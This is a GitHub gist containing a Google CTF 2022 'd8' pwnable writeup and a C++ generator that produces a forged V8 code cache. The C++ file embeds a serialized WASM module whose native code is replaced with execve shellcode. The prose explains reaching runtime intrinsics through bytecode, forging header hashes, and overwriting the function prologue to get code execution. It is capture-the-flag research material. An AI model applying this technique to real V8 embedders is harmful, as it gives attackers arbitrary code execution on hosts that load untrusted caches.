Skip to content

Instantly share code, notes, and snippets.

@Riatre
Created July 18, 2022 20:33
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Riatre/83d5fdb970946c8e185c5e1b2b842b1b to your computer and use it in GitHub Desktop.
Save Riatre/83d5fdb970946c8e185c5e1b2b842b1b to your computer and use it in GitHub Desktop.
Google CTF 2022 Pwnable d8 Writeup
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "include/libplatform/libplatform.h"
#include "include/v8-context.h"
#include "include/v8-initialization.h"
#include "include/v8-isolate.h"
#include "include/v8-local-handle.h"
#include "include/v8-primitive.h"
#include "include/v8-script.h"
#include "src/api/api-inl.h"
#include "src/base/platform/platform.h"
#include "src/codegen/compiler.h"
#include "src/execution/isolate-inl.h"
#include "src/flags/flags.h"
#include "src/objects/instance-type.h"
#include "src/objects/shared-function-info.h"
#include "src/roots/roots.h"
#include "src/snapshot/code-serializer.h"
#include "test/cctest/cctest.h"
const char* kJavaScriptCode = R"(
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,134,128,128,128,0,1,96,1,126,1,126,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,148,128,128,128,0,2,6,109,101,109,111,114,121,2,0,7,116,104,101,102,117,110,99,0,0,10,188,128,128,128,0,1,182,128,128,128,0,0,2,64,32,0,80,13,0,3,64,32,0,66,3,126,66,223,190,253,250,245,235,215,175,223,0,124,66,4,127,66,129,129,130,132,136,144,160,192,128,127,124,34,0,66,0,82,13,0,11,11,66,0,11]);
/*var mod = new WebAssembly.Module(wasm_code);
var inst = new WebAssembly.Instance(mod);
var func = inst.exports.thefunc;
%WasmTierUpFunction(inst, 0);
let serialized = %SerializeWasmModule(mod);
let hey = new Uint8Array(serialized);
for (let i = 0; i < serialized.byteLength; i++) {
%GlobalPrint("" + hey[i] + "\n");
}*/
let hack = new Uint8Array([96, 5, 222, 192, 74, 82, 180, 193, 255, 15, 0, 0, 213, 34, 201, 118, 192, 0, 0, 0, 0, 0, 0, 0, 4, 188, 0, 0, 0, 176, 0, 0, 0, 188, 0, 0, 0, 188, 0, 0, 0, 188, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 192, 0, 0, 0, 3, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 85, 106, 1, 254, 12, 36, 72, 184, 47, 99, 97, 116, 102, 108, 97, 103, 80, 72, 137, 231, 49, 210, 49, 246, 106, 59, 88, 15, 5, 49, 246, 86, 106, 8, 94, 72, 1, 230, 86, 72, 137, 230, 49, 210, 106, 59, 88, 15, 5, 0, 233, 12, 0, 0, 0, 102, 15, 31, 132, 0, 0, 0, 0, 0, 72, 139, 194, 72, 59, 35, 15, 134, 57, 0, 0, 0, 72, 107, 208, 3, 72, 3, 209, 72, 139, 194, 72, 153, 72, 247, 254, 72, 3, 199, 15, 132, 26, 0, 0, 0, 72, 107, 208, 3, 76, 139, 193, 76, 3, 194, 73, 139, 192, 72, 153, 72, 247, 254, 72, 139, 215, 72, 3, 208, 117, 194, 51, 192, 72, 139, 229, 93, 195, 72, 137, 69, 232, 72, 137, 93, 224, 232, 41, 0, 0, 0, 72, 139, 61, 140, 255, 255, 255, 190, 4, 0, 0, 0, 72, 139, 13, 118, 255, 255, 255, 72, 139, 69, 232, 72, 139, 93, 224, 235, 157, 144, 1, 0, 0, 0, 16, 4, 0, 0, 146, 0, 204, 204, 0,0, 0, 0, 58, 2, 87, 141, 2, 36]);
let deserialized = %DeserializeWasmModule(hack.buffer, wasm_code);
%DebugPrint(deserialized);
let new_inst = new WebAssembly.Instance(deserialized);
let new_func = new_inst.exports.thefunc;
%GlobalPrint("Deserialized func return " + new_func(BigInt(1)) + "\n");
)";
int main(int argc, char* argv[]) {
v8::internal::FlagList::SetFlagsFromCommandLine(&argc, argv, true);
v8::V8::InitializeICUDefaultLocation(argv[0]);
v8::V8::InitializeExternalStartupData(argv[0]);
std::unique_ptr<v8::Platform> platform = v8::platform::NewDefaultPlatform();
v8::V8::InitializePlatform(platform.get());
v8::V8::Initialize();
v8::Isolate::CreateParams create_params;
create_params.array_buffer_allocator =
v8::ArrayBuffer::Allocator::NewDefaultAllocator();
v8::Isolate* isolate = v8::Isolate::New(create_params);
{
v8::Isolate::Scope isolate_scope(isolate);
v8::HandleScope handle_scope(isolate);
v8::Local<v8::Context> context = v8::Context::New(isolate);
v8::Context::Scope context_scope(context);
v8::Local<v8::String> source_string = v8_str(kJavaScriptCode);
v8::ScriptCompiler::Source source(source_string);
v8::Local<v8::UnboundScript> script =
v8::ScriptCompiler::CompileUnboundScript(
isolate, &source, v8::ScriptCompiler::kEagerCompile)
.ToLocalChecked();
auto cache = v8::ScriptCompiler::CreateCodeCache(script);
printf("Data: %p, Length: %d\n", cache->data, cache->length);
FILE* fp = fopen("/home/riatre/ctf-archive/googlectf22/pwn/d8/test.bin", "w");
fwrite(cache->data, 1, cache->length, fp);
fclose(fp);
}
isolate->Dispose();
v8::V8::Dispose();
v8::V8::DisposePlatform();
delete create_params.array_buffer_allocator;
return 0;
}

d8

Summary

d8 is a pwnable challenge from Google CTF 2022. The challenge runs on a reasonably recent version of the V8 JavaScript engine and asks players to prepare a serialized "code cache", which, upon load & execution, should be able to run arbitrary code (execve("/catflag", nullptr, nullptr) in this case). We ended up solving it in an unintended way which does not involve any form of memory corruption. In this writeup we document how we approached the challenge, explored various possible exploitation paths and how we finally pwned it.

tl;dr V8 serialized code cache is a "trusted" asset, executing malicious one gives easy RCE.

Probe

The challenge description tells us that it was built on V8 commit 581a5ef7be2d340b4a0795a3b481ff7668e2252a. Looking at GitHub, we realized that it is basically V8 10.4.43, released on May 22 2022. While there are certainly exploitable bugs reported after May 22, none of them are public during the CTF, and we don't really believe that this is simply a 1-day challenge.

After a closer look at the v8.patch used to build the challenge, we found out it also didn't introduce any new bug to V8. It merely added a new v8_executable, the corresponding BUILD rules, and flipped flag wasm_write_protect_code_memory to false. The new executable, serving as the challenge entry, does seem intersting. It constructs a v8::ScriptCompiler::CachedData with arbitrary user input, and passed as code_cache, along with an empty source text, to v8::ScriptCompiler::Source. It then compiles and runs the source with the flag v8::ScriptCompiler::kConsumeCodeCache. In other words, the challenge allows us to load and execute arbitrary (potentially forged) code cache.

The documentation showes that code cache is a serialized blob of parsed or compiled JavaScript code. This is fishy: being named as a "cache", I doubt it was hardened against malicious inputs. 🤔

Looking up v8::ScriptCompiler::Source on cs.chromium.org/ leads to an interesting comment:

  class Source {
   public:
    // Source takes ownership of both CachedData and CodeCacheConsumeTask.
    // The caller *must* ensure that the cached data is from a trusted source.
    V8_INLINE Source(Local<String> source_string, const ScriptOrigin& origin,
                     CachedData* cached_data = nullptr,
                     ConsumeCodeCacheTask* consume_cache_task = nullptr);

It emphasizes that the cached data must be from a trusted source, hints at the possibility that "loading code cache from user input" is, indeed, insecure.

Producing Code Cache

We still don't know how exactly we can exploit this, but first, let's try to produce a code cache. We built a debug build of V8 with the challenge patch applied along with an extra exectuable:

/* #include <...> */
const char* kJavaScriptCode = R"(
while(1);
)";

int main(int argc, char* argv[]) {
  v8::internal::FlagList::SetFlagsFromCommandLine(&argc, argv, true);

  /* V8 initialization omitted */
  {
    /* scope guards omitted */

    v8::Local<v8::String> source_string = v8_str(kJavaScriptCode);
    v8::ScriptCompiler::Source source(source_string);

    v8::Local<v8::UnboundScript> script =
        v8::ScriptCompiler::CompileUnboundScript(
            isolate, &source, v8::ScriptCompiler::kEagerCompile)
            .ToLocalChecked();
    auto cache = v8::ScriptCompiler::CreateCodeCache(script);
    FILE* fp = fopen("test.bin", "w");
    fwrite(cache->data, 1, cache->length, fp);
    fclose(fp);
  }
  /* V8 finalization omitted */
  return 0;
}

However, the challenge binary rejected the blob. After some debugging we realized that there are a few sanity checkes on the blob header, mainly about source_hash and flags_hash. source_hash is just len(source_js_code) (Hi PHP), and flags_hash is compiled from the runtime command line flags, which is constant in the challenge binary. With this we can simply patch V8 to write the expected values:

diff --git a/src/snapshot/code-serializer.cc b/src/snapshot/code-serializer.cc
index ff416cbe020..3b84bf84261 100644
--- a/src/snapshot/code-serializer.cc
+++ b/src/snapshot/code-serializer.cc
@@ -592,8 +597,14 @@ SerializedCodeData::SerializedCodeData(const std::vector<byte>* payload,
   // Set header values.
   SetMagicNumber();
   SetHeaderValue(kVersionHashOffset, Version::Hash());
-  SetHeaderValue(kSourceHashOffset, cs->source_hash());
-  SetHeaderValue(kFlagHashOffset, FlagList::Hash());
+  if (FLAG_trace_serializer) {
+    SetHeaderValue(kSourceHashOffset, 0); // empty source
+    SetHeaderValue(kFlagHashOffset, 0x76c922d5); // release default flag hash
+  } else {
+    SetHeaderValue(kSourceHashOffset, cs->source_hash());
+    SetHeaderValue(kFlagHashOffset, FlagList::Hash());
+  }
   SetHeaderValue(kPayloadLengthOffset, static_cast<uint32_t>(payload->size()));

   // Zero out any padding in the header.

(we reused the flag --trace_serializer because, well, introducing a new flag in V8 requires a full rebuild and is painfully slow without a build farm)

Now the challenge binary no longer prints out "Code is rejected.", let's see where is our entry of the weird machine.

Code Cache Internal

What actually is V8 code cache and more importantly, what's in the serialized blob? Reading the code, it quickly becomes clear that v8::ScriptCompiler tries to deserialize a SharedFunctionInfo from the code cache. This is exciting: SharedFunctionInfo contains everything juicy about a function or top-level code in V8: its bytecode, associated data and even JIT-compiled native code (both baseline and TurboFan). If we can convince V8 to deserialize a SharedFunctionInfo with native code, we could have an easy win. Let's try to force a baseline compilation of the top-level code:

script->BindToCurrentContext()->Run(context).ToLocalChecked();
i::Handle<i::SharedFunctionInfo> sfi =
    i::Handle<i::SharedFunctionInfo>::cast(v8::Utils::OpenHandle(*script));
v8::internal::IsCompiledScope is_compiled_scope(
    *sfi, reinterpret_cast<v8::internal::Isolate*>(isolate));
v8::internal::Compiler::CompileSharedWithBaseline(
    reinterpret_cast<v8::internal::Isolate*>(isolate), sfi,
    v8::internal::Compiler::CLEAR_EXCEPTION, &is_compiled_scope);

Unfortunately, the serialized blob still does not contain any native-amd64-ish code, and --trace-serializer confirmed that no v8::internal::Code objects are serialized. In fact, it looks exactly the same as before. Diving into V8 internals, we found that it deliberately does not serialize native Code objects for code cache.

During the game we spent a few hours changing V8 to properly serialize baseline code objects in code cache. In the end it didn't work - we hit a CHECK() blocking any v8::internal::Code objects from being deserialized as code cache in ObjectDeserializer::Deserialize.

Bytecode & Intrinsics

Okay, it looks like the naive idea failed. Let's see how much havoc we can wreak with broken bytecodes. A cursory look confirmed that there are no real bounds checking in bytecode interpreter (only DCHECK), however when going over opcode list and looking for powerful primitives we found another interesting feature: there is an opcode called CallRuntime!

It turns out the "intrinsics" enabled with --allow-natives-syntax flag, i.e. %DebugPrint() etc, are actually runtime functions, and are dispatched with the CallRuntime instruction. Changing the kJavaScriptCode above to %GlobalPrint("Hooray World\n");, we can confirm that allow_natives_syntax flag checking only happen during parsing. Once the intrinsics were compiled in, the challenge binary happily runs the %DebugPrint() without --allow-natives-syntax.

WASM Code Cache

Skimming over the runtime function list, we found a promising target [DeserializeWasmModule] (https://source.chromium.org/chromium/chromium/src/+/main:v8/src/runtime/runtime.h;l=630?q=DeserializeWasmModule&ss=chromium%2Fchromium%2Fsrc&start=11). It was mainly used to test the WASM code caching. The blog post states that it is mainly used for caching compiled native code, let's see what's inside 🤔

With the following snippet:

var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,134,128,128,128,0,1,96,1,126,1,126,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,148,128,128,128,0,2,6,109,101,109,111,114,121,2,0,7,116,104,101,102,117,110,99,0,0,10,188,128,128,128,0,1,182,128,128,128,0,0,2,64,32,0,80,13,0,3,64,32,0,66,3,126,66,223,190,253,250,245,235,215,175,223,0,124,66,4,127,66,129,129,130,132,136,144,160,192,128,127,124,34,0,66,0,82,13,0,11,11,66,0,11]);

var mod = new WebAssembly.Module(wasm_code);
var inst = new WebAssembly.Instance(mod);
var func = inst.exports.thefunc;
%WasmTierUpFunction(inst, 0);
let serialized = %SerializeWasmModule(mod);
let hey = new Uint8Array(serialized);
for (let i = 0; i < serialized.byteLength; i++) {
  %GlobalPrint("" + hey[i] + "\n");
}

We obtained a serialized WASM module dump:

00000000  60 05 de c0  4a 52 b4 c1  ff 0f 00 00  d5 22 c9 76  │`···│JR··│····│·"·v│
00000010  c0 00 00 00  00 00 00 00  04 bc 00 00  00 b0 00 00  │····│····│····│····│
00000020  00 bc 00 00  00 bc 00 00  00 bc 00 00  00 06 00 00  │····│····│····│····│
00000030  00 00 00 00  00 c0 00 00  00 03 00 00  00 03 00 00  │····│····│····│····│
00000040  00 00 00 00  00 00 00 00  00 02 55 48  89 e5 6a 08  │····│····│··UH│··j·│
00000050  56 48 83 ec  10 48 83 f8  00 0f 84 69  00 00 00 48  │VH··│·H··│···i│···H│
00000060  8b 5e 27 48  b9 5f 5f 5f  5f 5f 5f 5f  5f 48 bf 81  │·^'H│·___│____│_H··│
00000070  80 80 80 80  80 80 80 be  04 00 00 00  e9 0c 00 00  │····│····│····│····│
00000080  00 66 0f 1f  84 00 00 00  00 00 48 8b  c2 48 3b 23  │·f··│····│··H·│·H;#│
00000090  0f 86 39 00  00 00 48 6b  d0 03 48 03  d1 48 8b c2  │··9·│··Hk│··H·│·H··│
000000a0  48 99 48 f7  fe 48 03 c7  0f 84 1a 00  00 00 48 6b  │H·H·│·H··│····│··Hk│
000000b0  d0 03 4c 8b  c1 4c 03 c2  49 8b c0 48  99 48 f7 fe  │··L·│·L··│I··H│·H··│
000000c0  48 8b d7 48  03 d0 75 c2  33 c0 48 8b  e5 5d c3 48  │H··H│··u·│3·H·│·]·H│
000000d0  89 45 e8 48  89 5d e0 e8  29 00 00 00  48 8b 3d 8c  │·E·H│·]··│)···│H·=·│
000000e0  ff ff ff be  04 00 00 00  48 8b 0d 76  ff ff ff 48  │····│····│H··v│···H│
000000f0  8b 45 e8 48  8b 5d e0 eb  9d 90 01 00  00 00 10 04  │·E·H│·]··│····│····│
00000100  00 00 92 00  cc cc 00 00  00 00 3a 02  57 8d 02 24  │····│····│··:·│W··$│

Spotted the 554889e5? That's push rbp; mov rbp, rsp, the usual x86_64 function prologue. Overwrite it with an int 3, call %DeserializeWasmModule and then the WASM function, we were greeted by a nice trace trap message. Fill in our shellcode and voila!

See another file in the gist for full exploit.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment